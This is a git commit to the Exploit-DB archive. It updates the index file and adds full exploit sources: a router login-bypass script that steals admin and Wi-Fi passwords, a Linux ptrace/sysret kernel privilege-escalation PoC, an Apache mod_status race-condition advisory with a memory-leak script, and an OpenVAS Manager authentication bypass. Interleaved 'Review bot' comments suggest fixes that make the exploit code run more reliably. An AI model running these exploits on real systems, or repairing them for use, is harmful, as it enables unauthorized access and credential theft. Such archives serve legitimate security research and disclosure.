Updated 07_23_2014

Offensive Security 2014-07-23 04:39:44 +00:00
parent b98d02460d
commit 2ea55e459e
14 changed files with 1989 additions and 1 deletions


@ -16855,7 +16855,7 @@ id,file,description,date,author,platform,type,port
19521,platforms/windows/remote/19521.txt,"MS IE 5.0/4.0.1 hhopen OLE Control Buffer Overflow Vulnerability",1999-09-27,"Shane Hird",windows,remote,0
19522,platforms/linux/remote/19522.txt,"Linux kernel 2.2 Predictable TCP Initial Sequence Number Vulnerability",1999-09-27,"Stealth and S. Krahmer",linux,remote,0
19523,platforms/linux/local/19523.txt,"python-wrapper Untrusted Search Path/Code Execution Vulnerability",2012-07-02,ShadowHatesYou,linux,local,0
19524,platforms/php/webapps/19524.txt,"WordPress Backup Plugin 2.0.1 Information Disclosure",2012-07-02,"Stephan Knauss",php,webapps,0
19524,platforms/php/webapps/19524.txt,"WordPress Backup Plugin 2.0.1 - Information Disclosure",2012-07-02,"Stephan Knauss",php,webapps,0
19525,platforms/windows/webapps/19525.txt,"IIS Short File/Folder Name Disclosure",2012-07-02,"Soroush Dalili",windows,webapps,0
19526,platforms/hardware/webapps/19526.rb,"WANGKONGBAO CNS-1000 UTM IPS-FW Directory Traversal",2012-07-02,"Dillon Beresford",hardware,webapps,0
19528,platforms/windows/local/19528.txt,"MS IE 4.1/5.0 Registration Wizard Buffer Overflow",1999-09-27,"Shane Hird",windows,local,0
@ -30481,6 +30481,7 @@ id,file,description,date,author,platform,type,port
33833,platforms/php/webapps/33833.txt,"Blog System 1.x Multiple Input Validation Vulnerabilities",2010-04-12,"cp77fk4r ",php,webapps,0
33834,platforms/php/webapps/33834.txt,"Vana CMS 'filename' Parameter Remote File Download Vulnerability",2010-04-13,"Pouya Daneshmand",php,webapps,0
33835,platforms/php/webapps/33835.txt,"AneCMS 1.0 Multiple Local File Include Vulnerabilities",2010-04-12,"AmnPardaz Security Research Team",php,webapps,0
33836,platforms/windows/shellcode/33836.txt,"Windows All Versions - Add Admin User Shellcode (194 bytes)",2014-06-22,"Giuseppe D'Amore",windows,shellcode,0
33838,platforms/windows/dos/33838.py,"Mocha W32 LPD 1.9 Remote Buffer Overflow Vulnerability",2010-04-15,mr_me,windows,dos,0
33839,platforms/multiple/remote/33839.txt,"Oracle E-Business Suite Financials 12 'jtfwcpnt.jsp' SQL Injection Vulnerability",2010-04-15,"Joxean Koret",multiple,remote,0
33840,platforms/asp/webapps/33840.txt,"Ziggurrat Farsi CMS 'bck' Parameter Directory Traversal Vulnerability",2010-04-15,"Pouya Daneshmand",asp,webapps,0
@ -30631,6 +30632,7 @@ id,file,description,date,author,platform,type,port
34007,platforms/php/webapps/34007.txt,"Dolibarr CMS 3.5.3 - Multiple Security Vulnerabilities",2014-07-08,"Deepak Rathore",php,webapps,0
34008,platforms/php/webapps/34008.txt,"Percha Multicategory Article Component 0.6 for Joomla! index.php controller Parameter Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0
34009,platforms/windows/remote/34009.rb,"Yokogawa CS3000 BKFSim_vhfd.exe Buffer Overflow",2014-07-08,metasploit,windows,remote,20010
34010,platforms/win32/dos/34010.html,"Internet Explorer 9/10 - CFormElement Use-After-Free and Memory Corruption PoC (MS14-035)",2014-07-08,"Drozdova Liudmila",win32,dos,0
34011,platforms/php/webapps/34011.txt,"Shopzilla Affiliate Script PHP 'search.php' Cross Site Scripting Vulnerability",2010-05-19,"Andrea Bocchetti",php,webapps,0
34012,platforms/php/webapps/34012.txt,"Caucho Resin Professional 3.1.5 'resin-admin/digest.php' Multiple Cross Site Scripting Vulnerabilities",2010-05-19,xuanmumu,php,webapps,0
34013,platforms/windows/remote/34013.txt,"McAfee Email Gateway 6.7.1 'systemWebAdminConfig.do' Remote Security Bypass Vulnerability",2010-05-19,"Nahuel Grisolia",windows,remote,0
@ -30644,6 +30646,7 @@ id,file,description,date,author,platform,type,port
34023,platforms/php/webapps/34023.txt,"Lisk CMS 4.4 'id' Parameter Multiple Cross Site Scripting and SQL Injection Vulnerabilities",2010-05-20,"High-Tech Bridge SA",php,webapps,0
34024,platforms/php/webapps/34024.txt,"Triburom 'forum.php' Cross Site Scripting Vulnerability",2010-01-15,"ViRuSMaN ",php,webapps,0
34025,platforms/php/webapps/34025.txt,"C99.php Shell - Authentication Bypass",2014-07-10,Mandat0ry,php,webapps,0
34026,platforms/linux/remote/34026.py,"OpenVAS Manager 4.0 - Authentication Bypass Vulnerability PoC",2014-07-10,EccE,linux,remote,0
34027,platforms/solaris/dos/34027.txt,"Sun Solaris 10 Nested Directory Tree Local Denial of Service Vulnerability",2010-05-21,"Maksymilian Arciemowicz",solaris,dos,0
34028,platforms/solaris/dos/34028.txt,"Sun Solaris 10 'in.ftpd' Long Command Handling Security Vulnerability",2010-05-21,"Maksymilian Arciemowicz",solaris,dos,0
34029,platforms/php/webapps/34029.txt,"Specialized Data Systems Parent Connect 2010.04.11 Multiple SQL Injection Vulnerabilities",2010-05-21,epixoip,php,webapps,0
@ -30709,12 +30712,14 @@ id,file,description,date,author,platform,type,port
34100,platforms/php/webapps/34100.txt,"Omeka 2.2 - CSRF And Stored XSS Vulnerability",2014-07-17,LiquidWorm,php,webapps,80
34102,platforms/linux/dos/34102.py,"ACME micro_httpd - Denial of Service",2014-07-18,"Yuval tisf Nativ",linux,dos,80
34103,platforms/cgi/webapps/34103.txt,"Barracuda Networks Message Archiver 650 - Persistent XSS Vulnerability",2014-07-18,Vulnerability-Lab,cgi,webapps,3378
34105,platforms/php/webapps/34105.txt,"Wordpress Plugin Gallery Objects 0.4 - SQL Injection",2014-07-18,"Claudio Viviani",php,webapps,80
34106,platforms/php/webapps/34106.txt,"cPanel 11.25 Image Manager 'target' Parameter Local File Include Vulnerability",2010-06-07,"AnTi SeCuRe",php,webapps,0
34107,platforms/php/webapps/34107.txt,"boastMachine 3.1 'key' Parameter Cross Site Scripting Vulnerability",2010-06-07,"High-Tech Bridge SA",php,webapps,0
34108,platforms/java/webapps/34108.txt,"PRTG Traffic Grapher 6.2.1 'url' Parameter Cross Site Scripting Vulnerability",2009-01-08,"Patrick Webster",java,webapps,0
34109,platforms/php/webapps/34109.html,"log1 CMS 2.0 Session Handling Remote Security Bypass and Remote File Include Vulnerabilities",2010-06-03,"High-Tech Bridge SA",php,webapps,0
34110,platforms/php/webapps/34110.txt,"PG Auto Pro SQL Injection and Cross Site Scripting Vulnerabilities",2010-06-09,Sid3^effects,php,webapps,0
34111,platforms/multiple/webapps/34111.txt,"GREEZLE - Global Real Estate Agent Login Multiple SQL Injection Vulnerabilities",2010-06-09,"L0rd CrusAd3r",multiple,webapps,0
34112,platforms/windows/local/34112.txt,"Microsoft XP SP3 MQAC.sys - Arbitrary Write Privilege Escalation",2014-07-19,KoreLogic,windows,local,0
34113,platforms/php/webapps/34113.py,"SilverStripe CMS 2.4 File Renaming Security Bypass Vulnerability",2010-06-09,"John Leitch",php,webapps,0
34114,platforms/php/webapps/34114.txt,"Joomla! JReservation Component Cross Site Scripting Vulnerability",2010-06-09,Sid3^effects,php,webapps,0
34115,platforms/windows/remote/34115.txt,"McAfee Unified Threat Management Firewall 4.0.6 'page' Parameter Cross Site Scripting Vulnerability",2010-06-07,"Adam Baldwin",windows,remote,0
@ -30724,5 +30729,13 @@ id,file,description,date,author,platform,type,port
34119,platforms/php/webapps/34119.txt,"Bits Video Script 2.04/2.05 addvideo.php File Upload Arbitrary PHP Code Execution",2010-01-18,indoushka,php,webapps,0
34120,platforms/php/webapps/34120.txt,"Bits Video Script 2.04/2.05 register.php File Upload Arbitrary PHP Code Execution",2010-01-18,indoushka,php,webapps,0
34121,platforms/php/webapps/34121.txt,"Bits Video Script 2.04/2.05 'search.php' Cross Site Scripting Vulnerability",2010-01-18,indoushka,php,webapps,0
34124,platforms/php/webapps/34124.txt,"Wordpress WP BackupPlus - Database And Files Backup Download (0day)",2014-07-20,pSyCh0_3D,php,webapps,0
34126,platforms/windows/remote/34126.txt,"Microsoft Help and Support Center 'sysinfo/sysinfomain.htm' Cross Site Scripting Weakness",2010-06-10,"Tavis Ormandy",windows,remote,0
34127,platforms/php/webapps/34127.txt,"Arab Portal 2.2 'members.php' SQL Injection Vulnerability",2010-06-10,SwEET-DeViL,php,webapps,0
34128,platforms/hardware/webapps/34128.py,"MTS MBlaze Ultra Wi-Fi / ZTE AC3633 - Multiple Vulnerabilities",2014-07-21,"Ajin Abraham",hardware,webapps,80
34129,platforms/windows/dos/34129.txt,"World Of Warcraft 3.3.5a (macros-cache.txt) - Stack Overflow",2014-07-21,"Alireza Chegini",windows,dos,0
34130,platforms/linux/webapps/34130.rb,"Raritan PowerIQ 4.1.0 - SQL Injection Vulnerability",2014-07-21,"Brandon Perry",linux,webapps,80
34132,platforms/php/remote/34132.txt,"IBM GCM16/32 1.20.0.22575 - Multiple Vulnerabilities",2014-07-21,"Alejandro Alvarez Bravo",php,remote,443
34133,platforms/linux/dos/34133.txt,"Apache 2.4.7 mod_status Scoreboard Handling Race Condition",2014-07-21,"Marek Kroemeke",linux,dos,0
34134,platforms/lin_amd64/local/34134.c,"Linux Kernel ptrace/sysret - Local Privilege Escalation",2014-07-21,"Vitaly Nikolenko",lin_amd64,local,0
34135,platforms/windows/dos/34135.py,"DjVuLibre <= 3.5.25.3 - Out of Bounds Access Violation",2014-07-22,drone,windows,dos,0



@ -0,0 +1,81 @@
#Author: Ajin Abraham - xboz
#http://opensecurity.in
#Product MTS MBlaze 3G Wi-Fi Modem
#System Version 107
#Manufacturer ZTE
#Model AC3633
import requests
import os
import urllib2
print "MTS MBlaze Ultra Wi-Fi / ZTE AC3633 Exploit"
print "Vulnerabilities"
print "Login Bypass | Router Credential Stealing | Wi-Fi Password Stealing | CSRF | Reset Password without old password and Session\n"
url='http://192.168.1.1'
def find_between( s, first, last ):
try:
start = s.index( first ) + len( first )
end = s.index( last, start )
return s[start:end]
except ValueError:
return ""
#Vulnerable Static Cookies
cookies = dict(iusername='logined')
#Login Bypass
login_url = url+'/en/index.asp'
print "\nAttempting Login :"+url
print '================='
try:
response=urllib2.urlopen(url,timeout=1)
except:
print "Cannot Reach : "+url
exit
r = requests.get(login_url, cookies=cookies)
print 'Status : ' + str(r.status_code)
if "3g.asp" in r.text:
print "Login Sucessfull!"
#Information Gathering
print "\nInformation"
print "========="
info_url=url+'/en/3g.asp'
i= requests.get(info_url, cookies=cookies)
ip=find_between(i.text,'"g3_ip" disabled="disabled" style="background:#ccc;" size="16" maxlength="15" value="','"></td>')
subnet =find_between(i.text,'"g3_mask" disabled="disabled" style="background:#ccc;" size="16" maxlength="15" value="','"></td>')
gateway=find_between(i.text,'"g3_gw" disabled="disabled" style="background:#ccc;" size="16" maxlength="15" value="','"></td>')
print "IP : " +ip
print "Subnet : "+subnet
print "Gateway : " +gateway
#Steal Login Password
print "\nStealing Router Login Credentials"
print "======================"
login_pwd_url=url+'/en/password.asp'
p = requests.get(login_pwd_url, cookies=cookies)
print 'Status : ' + str(p.status_code)
print 'Username : admin' #default
passwd=find_between(p.text,'id="sys_password" value="','"/>')
print 'Password : '+ passwd
print '\nExtracting WPA/WPA2 PSK Key'
print '================='
#Wi-Fi Password Extraction
wifi_pass_url=url+'/en/wifi_security.asp'
s = requests.get(wifi_pass_url, cookies=cookies)
print 'Status: ' + str(s.status_code)
wpa=find_between(s.text,"wpa_psk_key]').val('","');")
wep=find_between(s.text,"wep_key]').val('","');")
print "WPA/WPA2 PSK : " + wpa
print "WEP Key : " + wep
print "\nOther Vulnerabilities"
print "======================="
print "\n1.Cross Site Request Forgery in:\n\nhttp://192.168.1.1/en/dhcp_reservation.asp\nhttp://192.168.1.1/en/mac_filter.asp \nhttp://192.168.1.1/en/password.asp"
print "\n2.Password Reset without old password and Session"
print """
POST /goform/formSyWebCfg HTTP/1.1
Host: 192.168.1.1
Content-Type: application/x-www-form-urlencoded
Referer: http://192.168.1.1/en/password.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8,es;q=0.6,ms;q=0.4
Content-Length: 52
action=Apply&sys_cfg=changed&sys_password=mblazetestpassword
"""
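Review bot: The reachability check does not stop the script: the `exit` on the line after `print "Cannot Reach : "+url` is a bare name, not a call, so execution falls through to `requests.get(login_url, ...)` and dies with a second, less clear traceback. Change it to `exit(1)` (or `sys.exit(1)` with `import sys`), and narrow the bare `except:` to `except Exception:` so a KeyboardInterrupt during the probe is not reported as an unreachable host. The bodies of `find_between` and of the try/except appear unindented in this rendered hunk; I assume the indentation is intact in the file itself.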

125
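--- a/platforms/lin_amd64/local/34134.c
+++ b/platforms/lin_amd64/local/34134.c
@@ -0,0 +1,125 @@
+/**
+* CVE-2014-4699 ptrace/sysret PoC
+* by Vitaly Nikolenko
+* vnik@hashcrack.org
+*
+* > gcc -O2 poc_v0.c
+*
+* This code is kernel specific. On Ubuntu 12.04.0 LTS (3.2.0-23-generic), the
+* following will trigger the #GP in sysret and overwrite the #PF handler so we
+* can land to our NOP sled mapped at 0x80000000.
+* However, once landed, the IDT will be trashed. We can either attempt to
+* restore it (then escalate privileges and execute our shellcode) or find
+* something else to overwrite that would transfer exec flow to our controlled
+* user-space address. Since 3.10.something, IDT is read-only anyway. If you
+* have any ideas, let me know.
+*/
+#include <stdio.h>
+#include <stdint.h>
+#include <assert.h>
+#include <sys/ptrace.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <sys/syscall.h>
+#include <sys/user.h>
+#include <unistd.h>
+#include <sys/mman.h>
+#include <errno.h>
+#define SIZE 0x10000000
+typedef int __attribute__((regparm(3))) (*commit_creds_fn)(unsigned long cred);
+typedef unsigned long __attribute__((regparm(3))) (*prepare_kernel_cred_fn)(unsigned long cred);
+unsigned long __user_cs;
+unsigned long __user_ss;
+unsigned long __user_rflags;
+void __attribute__((regparm(3))) payload() {
+uint32_t *fixptr = (void*)0xffffffff81dd70e8;
+// restore the #PF handler
+*fixptr = -1;
+//commit_creds_fn commit_creds = (commit_creds_fn)0xffffffff81091630;
+//prepare_kernel_cred_fn prepare_kernel_cred = (prepare_kernel_cred_fn)0xffffffff810918e0;
+//commit_creds(prepare_kernel_cred((uint64_t)NULL));
+//__asm__ volatile ("swapgs\n\t"
+// "...");
+}
+int main() {
+struct user_regs_struct regs;
+uint8_t *trampoline, *tmp;
+int status;
+struct {
+uint16_t limit;
+uint64_t addr;
+} __attribute__((packed)) idt;
+// MAP_POPULATE so we don't trigger extra #PF
+trampoline = mmap(0x80000000, SIZE, 7|PROT_EXEC|PROT_READ|PROT_WRITE, 0x32|MAP_FIXED|MAP_POPULATE|MAP_GROWSDOWN, 0,0);
+assert(trampoline == 0x80000000);
+memset(trampoline, 0x90, SIZE);
+tmp = trampoline;
+tmp += SIZE-1024;
+memcpy(tmp, &payload, 1024);
+memcpy(tmp-13,"\x0f\x01\xf8\xe8\5\0\0\0\x0f\x01\xf8\x48\xcf", 13);
+pid_t chld;
+if ((chld = fork()) < 0) {
+perror("fork");
+exit(1);
+}
+if (chld == 0) {
+if (ptrace(PTRACE_TRACEME, 0, 0, 0) != 0) {
+perror("PTRACE_TRACEME");
+exit(1);
+}
+raise(SIGSTOP);
+fork();
+return 0;
+}
+asm volatile("sidt %0" : "=m" (idt));
+printf("IDT addr = 0x%lx\n", idt.addr);
+waitpid(chld, &status, 0);
+ptrace(PTRACE_SETOPTIONS, chld, 0, PTRACE_O_TRACEFORK);
+ptrace(PTRACE_CONT, chld, 0, 0);
+waitpid(chld, &status, 0);
+ptrace(PTRACE_GETREGS, chld, NULL, &regs);
+regs.rdi = 0x0000000000000000;
+regs.rip = 0x8fffffffffffffff;
+regs.rsp = idt.addr + 14*16 + 8 + 0xb0 - 0x78;
+// attempt to restore the IDT
+regs.rdi = 0x0000000000000000;
+regs.rsi = 0x81658e000010cbd0;
+regs.rdx = 0x00000000ffffffff;
+regs.rcx = 0x81658e000010cba0;
+regs.rax = 0x00000000ffffffff;
+regs.r8 = 0x81658e010010cb00;
+regs.r9 = 0x00000000ffffffff;
+regs.r10 = 0x81668e0000106b10;
+regs.r11 = 0x00000000ffffffff;
+regs.rbx = 0x81668e0000106ac0;
+regs.rbp = 0x00000000ffffffff;
+regs.r12 = 0x81668e0000106ac0;
+regs.r13 = 0x00000000ffffffff;
+regs.r14 = 0x81668e0200106a90;
+regs.r15 = 0x00000000ffffffff;
+ptrace(PTRACE_SETREGS, chld, NULL, &regs);
+ptrace(PTRACE_CONT, chld, 0, 0);
+ptrace(PTRACE_DETACH, chld, 0, 0);
+}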
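Review bot: `memset`, `memcpy`, `exit` and `raise` are called in main without their declaring headers (`<string.h>`, `<stdlib.h>` and `<signal.h>` are not in the include list), so they are implicitly declared, which is an error under C99 and later compilers; add `#include <string.h>`, `#include <stdlib.h>` and `#include <signal.h>` after `#include <errno.h>`. The `mmap` result is assigned and compared as a bare integer constant (`trampoline == 0x80000000`) and its flag arguments mix magic numbers (`7`, `0x32`) with the `PROT_*`/`MAP_*` names, so the intent of those extra bits is not readable from the call. The register constants under `// attempt to restore the IDT` and the `fixptr` address in `payload` are tied to the single kernel build named in the header comment; a comment at the start of that block, e.g. `// hard-coded for Ubuntu 12.04 3.2.0-23-generic only (see header)`, would keep that dependency visible where the values are used. None of the `ptrace` return values after `PTRACE_TRACEME` are checked, so a failed `PTRACE_SETOPTIONS` or `PTRACE_SETREGS` is silently ignored.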

394
platforms/linux/dos/34133.txt Executable file

@ -0,0 +1,394 @@
--[ 0. Sparse summary
Race condition between updating httpd's "scoreboard" and mod_status,
leading to several critical scenarios like heap buffer overflow with
user
supplied payload and leaking heap which can leak critical memory
containing
htaccess credentials, ssl certificates private keys and so on.
--[ 1. Prerequisites
Apache httpd compiled with MPM event or MPM worker.
The tested version was 2.4.7 compiled with:
./configure --enable-mods-shared=reallyall --with-included-apr
The tested mod_status configuration in httpd.conf was:
SetHandler server-status
ExtendedStatus On
--[ 2. Race Condition
Function ap_escape_logitem in server/util.c looks as follows:
1908AP_DECLARE(char *) ap_escape_logitem(apr_pool_t *p, const char
*str)
1909{
1910 char *ret;
1911 unsigned char *d;
1912 const unsigned char *s;
1913 apr_size_t length, escapes = 0;
1914
1915 if (!str) {
1916 return NULL;
1917 }
1918
1919 /* Compute how many characters need to be escaped */
1920 s = (const unsigned char *)str;
1921 for (; *s; ++s) {
1922 if (TEST_CHAR(*s, T_ESCAPE_LOGITEM)) {
1923 escapes++;
1924 }
1925 }
1926
1927 /* Compute the length of the input string, including NULL
*/
1928 length = s - (const unsigned char *)str + 1;
1929
1930 /* Fast path: nothing to escape */
1931 if (escapes == 0) {
1932 return apr_pmemdup(p, str, length);
1933 }
In the for-loop between 1921 and 1925 lines function is computing the
length of
supplied str (almost like strlen, but additionally it counts special
characters
which need to be escaped). As comment in 1927 value says, function
computes count
of bytes to copy. If there's nothing to escape function uses
apr_pmemdup to duplicate
the str. In our single-threaded mind everything looks good, but tricky
part starts
when we introduce multi-threading. Apache in MPM mode runs workers as
threads, let's
consider the following scenario:
1) ap_escape_logitem(pool, "") is called
2) for-loop in 1921 line immediately escapes, because *s is in
first loop run
3) malicious thread change memory under *s to another value
(something which is not )
4) apr_pmemdup copies that change value to new string and returns
it
Output from the ap_escape_logitem is considered to be a string, if
scenario above would occur,
then returned string would not be zeroed at the end, which may be
harmful. The mod_status
code looks as follows:
833 ap_rprintf(r, "%s%s"
834 "%snn",
835 ap_escape_html(r->pool,
836
ws_record->client),
837 ap_escape_html(r->pool,
838
ws_record->vhost),
839 ap_escape_html(r->pool,
840
ap_escape_logitem(r->pool,
841
ws_record->request)));
The relevant call to ap_escape_html() is at line 839 after the
evaluation of ap_escape_logitem().
The first argument passed to the ap_escape_logitem() is in fact an apr
pool associated with
the HTTP request and defined in the request_rec structure.
This code is a part of a larger for-loop where code is iterating over
worker_score structs which is
defined as follows:
90struct worker_score {
91#if APR_HAS_THREADS
92 apr_os_thread_t tid;
93#endif
94 int thread_num;
95 /* With some MPMs (e.g., worker), a worker_score can
represent
96 * a thread in a terminating process which is no longer
97 * represented by the corresponding process_score. These
MPMs
98 * should set pid and generation fields in the worker_score.
99 */
100 pid_t pid;
101 ap_generation_t generation;
102 unsigned char status;
103 unsigned short conn_count;
104 apr_off_t conn_bytes;
105 unsigned long access_count;
106 apr_off_t bytes_served;
107 unsigned long my_access_count;
108 apr_off_t my_bytes_served;
109 apr_time_t start_time;
110 apr_time_t stop_time;
111 apr_time_t last_used;
112#ifdef HAVE_TIMES
113 struct tms times;
114#endif
115 char client[40]; /* Keep 'em small... but large
enough to hold an IPv6 address */
116 char request[64]; /* We just want an idea... */
117 char vhost[32]; /* What virtual host is being
accessed? */
118};
The 'request' field in a worker_score structure is particularly
interesting - this field can be changed inside
the copy_request function, which is called by the
update_child_status_internal. This change may occur when the
mod_status is iterating over the workers at the same time the
ap_escape_logitem is called within a different
thread, leading to a race condition. We can trigger this exact
scenario in order to return a string without a
trailing . This can be achived by running two clients, one triggering
the mod_status handler and second
sending random requests to the web server. Let's consider the
following example:
1) the mod_status iterates over workers invoking
update_child_status_internal()
2) at some point for one worker mod_status calls
ap_escape_logitem(pool, ws_record->request)
3) let's asume that ws_record->request at the beginning is ""
literally at the first byte.
4) inside the ap_escape_logitem function the length of the
ws_record->request is computed, which is 1
(an empty string consisting of )
5) another thread modifies ws_record->request (in fact it's called
ws->request in update_child_status_internal
function but it's exactly the same location in memory) and puts
there i.e. "GET / HTTP/1.0"
6) the ap_pmemdup(pool, str, 1) in ap_escape_logitem copies the
first one byte from "GET / HTTP/1.0" - "G" in
that case and returns it. The ap_pmemdup looks as follows:
112APR_DECLARE(void *) apr_pmemdup(apr_pool_t *a, const void
*m, apr_size_t n)
113{
114 void *res;
115
116 if (m == NULL)
117 return NULL;
118 res = apr_palloc(a, n);
119 memcpy(res, m, n);
120 return res;
It allocates memory using apr_palloc function which returns
"ditry" memory (note that apr_pcalloc overwrite
allocated memory with NULs).
So it's non-deterministic what's after the copied "G" byte.
There might be or might be not. For now let's
assume that the memory allocated by apr_palloc was dirty
(containing random bytes).
7) ap_escape_logitem returns "G....." .junk. ""
The value from the example above is then pushed to the ap_escape_html2
function which is also declared in util.c:
1860AP_DECLARE(char *) ap_escape_html2(apr_pool_t *p, const char
*s, int toasc)
1861{
1862 int i, j;
1863 char *x;
1864
1865 /* first, count the number of extra characters */
1866 for (i = 0, j = 0; s[i] != ''; i++)
1867 if (s[i] == '')
1868 j += 3;
1869 else if (s[i] == '&')
1870 j += 4;
1871 else if (s[i] == '"')
1872 j += 5;
1873 else if (toasc && !apr_isascii(s[i]))
1874 j += 5;
1875
1876 if (j == 0)
1877 return apr_pstrmemdup(p, s, i);
1878
1879 x = apr_palloc(p, i + j + 1);
1880 for (i = 0, j = 0; s[i] != ''; i++, j++)
1881 if (s[i] == '') {
1886 memcpy(&x[j], ">", 4);
1887 j += 3;
1888 }
1889 else if (s[i] == '&') {
1890 memcpy(&x[j], "&", 5);
1891 j += 4;
1892 }
1893 else if (s[i] == '"') {
1894 memcpy(&x[j], """, 6);
1895 j += 5;
1896 }
1897 else if (toasc && !apr_isascii(s[i])) {
1898 char *esc = apr_psprintf(p, "&#%3.3d;", (unsigned
char)s[i]);
1899 memcpy(&x[j], esc, 6);
1900 j += 5;
1901 }
1902 else
1903 x[j] = s[i];
1904
1905 x[j] = '';
1906 return x;
1907}
If the string from the example above would be passed to this function
we should get the following code-flow:
1) in the for-loop started in line 1866 we count the length of
escaped string
2) because 's' string contains junk (due to only one byte being
allocated by the apr_palloc function),
it may contain '>' character. Let's assume that this is our
case
3) after for-loop in 1866 line 'j' is greater than 0 (at least one
s[i] equals '>' as assumed above
4) in the 1879 line memory for escaped 'd' string is allocated
5) for-loop started in line 1880 copies string 's' to the escaped
'd' string BUT apr_palloc has allocated
only one byte for 's'. Thus, for each i > 0 the loop reads
random memory and copies that value
to 'd' string. At this point it's possible to trigger an
information leak vulnerability (see section 5).
However the 's' string may overlap with 'd' i.e.:
's' is allocated under 0 with contents s = "AAAAAAAA>"
'd' is allocated under 8 then s[8] = d[0].
If that would be the case, then for-loop would run forever (s[i] never
would be since it was overwritten in the loop
by non-zero). Forever... until it hits an unmapped memory or read only
area.
Part of the scoreboard.c code which may overwrite the
ws_record->request was discovered using a tsan:
#1 ap_escape_logitem ??:0 (exe+0x0000000411f2)
#2 status_handler
/home/akat-1/src/httpd-2.4.7/modules/generators/mod_status.c:839
(mod_status.so+0x0000000044b0)
#3 ap_run_handler ??:0 (exe+0x000000084d98)
#4 ap_invoke_handler ??:0 (exe+0x00000008606e)
#5 ap_process_async_request ??:0 (exe+0x0000000b7ed9)
#6 ap_process_http_async_connection http_core.c:0
(exe+0x0000000b143e)
#7 ap_process_http_connection http_core.c:0 (exe+0x0000000b177f)
#8 ap_run_process_connection ??:0 (exe+0x00000009d156)
#9 process_socket event.c:0 (exe+0x0000000cc65e)
#10 worker_thread event.c:0 (exe+0x0000000d0945)
#11 dummy_worker thread.c:0 (libapr-1.so.0+0x00000004bb57)
#12 :0 (libtsan.so.0+0x00000001b279)
Previous write of size 1 at 0x7feff2b862b8 by thread T2:
#0 update_child_status_internal scoreboard.c:0
(exe+0x00000004d4c6)
#1 ap_update_child_status_from_conn ??:0 (exe+0x00000004d693)
#2 ap_process_http_async_connection http_core.c:0
(exe+0x0000000b139a)
#3 ap_process_http_connection http_core.c:0 (exe+0x0000000b177f)
#4 ap_run_process_connection ??:0 (exe+0x00000009d156)
#5 process_socket event.c:0 (exe+0x0000000cc65e)
#6 worker_thread event.c:0 (exe+0x0000000d0945)
#7 dummy_worker thread.c:0 (libapr-1.so.0+0x00000004bb57)
#8 :0 (libtsan.so.0+0x00000001b279)
--[ 3. Consequences
Race condition described in section 2, may lead to:
- information leak in case when the string returned by
ap_escape_logitem is not at the end,
junk after copied bytes may be valuable
- overwriting heap with a user supplied value which may imply code
execution
--[ 4. Exploitation
In order to exploit the heap overflow bug it's necessary to get
control over:
1) triggering the race-condition bug
2) allocating 's' and 'd' strings in the ap_escape_html2 to overlap
3) part of 's' which doesn't overlap with 'd' (this string is copied
over and over again)
4) overwriting the heap in order to get total control over the cpu or
at least modify the
apache's handler code flow for our benefits
--[ 5. Information Disclosure Proof of Concept
-- cut
#! /usr/bin/env python
import httplib
import sys
import threading
import subprocess
import random
def send_request(method, url):
try:
c = httplib.HTTPConnection('127.0.0.1', 80)
c.request(method,url);
if "foo" in url:
print c.getresponse().read()
c.close()
except Exception, e:
print e
pass
def mod_status_thread():
while True:
send_request("GET", "/foo?notables")
def requests():
evil = ''.join('A' for i in range(random.randint(0, 1024)))
while True:
send_request(evil, evil)
threading.Thread(target=mod_status_thread).start()
threading.Thread(target=requests).start()
-- cut
Below are the information leak samples gathered by running the poc
against the
testing Apache instance. Leaks include i.e. HTTP headers, htaccess
content,
httpd.conf content etc. On a live systems with a higher traffic
samples should
be way more interesting.
$ ./poc.py | grep "" |grep -v AAAA | grep -v "{}"| grep -v notables
127.0.0.1 {A} []
127.0.0.1 {A.01 cu0 cs0
127.0.0.1 {A27.0.0.1} []
127.0.0.1 {A|0|10 [Dead] u.01 s.01 cu0 cs0
127.0.0.1 {A
Û []
127.0.0.1 {A HTTP/1.1} []
127.0.0.1 {Ab><br />
127.0.0.1 {AAA}</i> <b>[127.0.1.1:19666]</b><br
/>
127.0.0.1 {A0.1.1:19666]</b><br />
127.0.0.1 {A§} []
127.0.0.1 {A cs0
127.0.0.1 {Adentity
127.0.0.1 {A HTTP/1.1} []
127.0.0.1 {Ape: text/html; charset=ISO-8859-1
127.0.0.1 {Ahome/IjonTichy/httpd-2.4.7-vanilla/htdocs/} []
127.0.0.1 {Aÿÿÿÿÿÿÿ} []
127.0.0.1 {Aanilla/htdocs/foo} []
127.0.0.1 {A0n/httpd-2.4.7-vanilla/htdocs/foo/} []
127.0.0.1 {A......................................... } []
127.0.0.1 {A-2014 16:23:30 CEST} []
127.0.0.1 {Acontent of htaccess
127.0.0.1 {Aver: Apache/2.4.7 (Unix)
127.0.0.1 {Aroxy:balancer://mycluster} []
We hope you enjoyed it.
Regards,
Marek Kroemeke, AKAT-1 and 22733db72ab3ed94b5f8a1ffcde850251fe6f466

75
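--- a/platforms/linux/remote/34026.py
+++ b/platforms/linux/remote/34026.py
@@ -0,0 +1,75 @@
+#!/usr/bin/python
+# Exploit Title: OpenVAS Manager 4.0 Authentication Bypass Vulnerability PoC
+# Date: 09/07/2014
+# Exploit Author: EccE
+# Vendor Homepage: http://www.openvas.org/
+# Software Link: http://wald.intevation.org/frs/?group_id=29
+# Version: OpenVAS Manager 4.0
+# Tested on: Debian GNU/Linux testing (jessie)
+# CVE : CVE-2013-6765
+"""
+Small list of working commands
+get_agents
+get_configs
+get_alerts
+get_filters
+get_lsc_credentials
+get_notes
+get_nvts
+get_targets
+get_users
+get_schedules
+More commands (~70 commands) can be found directly in the omc.c file. Not all of them are working though.
+As designed in OMP protocol, commands must be sent this way : <COMMAND/>
+"""
+import socket, ssl
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+# Require a certificate from the server. We used a self-signed certificate
+# so here cacerts.pem must be the server certificate itself.
+ssl_sock = ssl.wrap_socket(s,
+ca_certs="/var/lib/openvas/CA/cacert.pem",
+cert_reqs=ssl.CERT_REQUIRED)
+# OpenVAS Manager listen by default on localhost tcp/9390
+ssl_sock.connect(('localhost', 9390))
+print "#################################################################"
+print "# Proof of Concept - OpenVAS Manager 4.0 Authentication Bypass #"
+print "#################################################################"
+print "\n"
+print "--> Retrieving version...(exploiting the bug !)\n"
+ssl_sock.write("<get_version/>")
+data = ssl_sock.read()
+print data
+print "\n"
+print "--> Retrieving slaves...\n"
+ssl_sock.write("<get_slaves/>")
+tasks = ssl_sock.read()
+print tasks
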